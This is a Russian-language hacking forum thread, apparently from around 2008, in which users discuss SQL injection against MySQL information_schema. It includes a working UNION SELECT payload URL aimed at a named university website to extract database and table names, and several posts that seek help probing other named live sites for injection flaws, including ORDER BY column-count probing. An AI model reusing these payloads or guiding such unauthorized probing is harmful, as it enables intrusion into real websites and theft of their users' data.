jokester точно знать не надо, на случай если префикс у колонки +union+select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
Нет, японял о чем ты говоришь но это не то, .Slip правильно сказал в Information_schema нет информации о содержимом полей (что вполне логично) хотя еслиб для регулярок были бы такие функции как в php (ну там карманы и все такое, то мож и можно было ченить придумать, хотя не уверен) вобще меня что то смущает в этом, но это так скорее паранойя
Как он выведет имя таблицы из таблицы с данными о колонках? Ведь данные из infotmation_schema.columns по сути своей считываются с выражением Where. PS Или Constantin'у и jokester'у пора идти читать маны, или мне
Сайт http://www.faces.md/ сделан на PHP и использует MySQL но у меня мозги не шарят как найти уязвимость к коде или базе если в адресной строки ничего конкретного не отображается кроме http://www.faces.md/user/226955 Жду помощи
.Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо.. з\ы или тебя сама конструкция запроса смутила?
Полностью согласен, это как в MSSQL или SYBASE в syscolumns есть информация о объектах которым принадлежат колонки (только там id объекта) а в мускуле именно имя таблицы
2 .Slip можно даже имя базы оттуда вытащить пример(бага старая найдена не мной) _http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58),table_name),5,6,7,8,9,10,11+from+information_schema.columns+where+column_name=0x75736572+limit+1,1/*
разговор ни о чём узнать имя таблицы по её содержимому нельзя, а дальше непонятная мне дискуссия про information_schema =\ PS онтечад
История оценок репутации для Spyder: +3 Ваши вопросы по уязвимо... 18.02.2008 20:55 ZAMUT если мускул 5.х то можно Вот покажи мне запрос который вернёт имя таблицы, при том что я не знаю имён колонок и у меня только одно значение 123456. Кто сказал что колонка с паролями имеет в своём имени "pas", мб она называется "paroli" В таком случае запрос Константина select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/* работать не будет, и вообще это больше похоже на игру "угадай буквы в имени колонки". Ответ на вопрос 0nep@t0p'a нет, Слип и Scipio правильно написали, узнать таблицу по её содержимому нельзя
Code: http://www.newspress.fr/index.asp?lang=hfg' собственно что енто уязвимость ? что из этого можно вообше можно выжать если вообше можно ? собственно с таким первый раз сталкиваюсь собственно при подставлении в значение ленг сужествуюшего фаыла начинаеть материться под другому тока на французком
Хочу спросить совета, и помощи в раскрутке скули, если она конечно присутствует на данном сайте: _http://lokomotiv.yar.ru Захожу по адресу - _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140 При подстановке кавычки - новость со страницы пропадает, ошибки никакой не пишет, если переменную пишу id=2142-1 , то выдаёт страницу как при id=2141 то есть вроде бы скуль есть. Вставляю конструкцию order by и думаю, что получаю 11 столбцов, так как при таком запросе _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2011 страница выводится без ошибок, а вот при таком _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2012 инфа со страницы пропадает (конкретно новость). Попытался продолжить с union select , и ничего не вышло, номера столбцов не выходят. Может кто подскажет, что не так делаю? Или может вообще глупость творю и никакой уязвимости там нет? Заранее всем откликнувшимся мерси.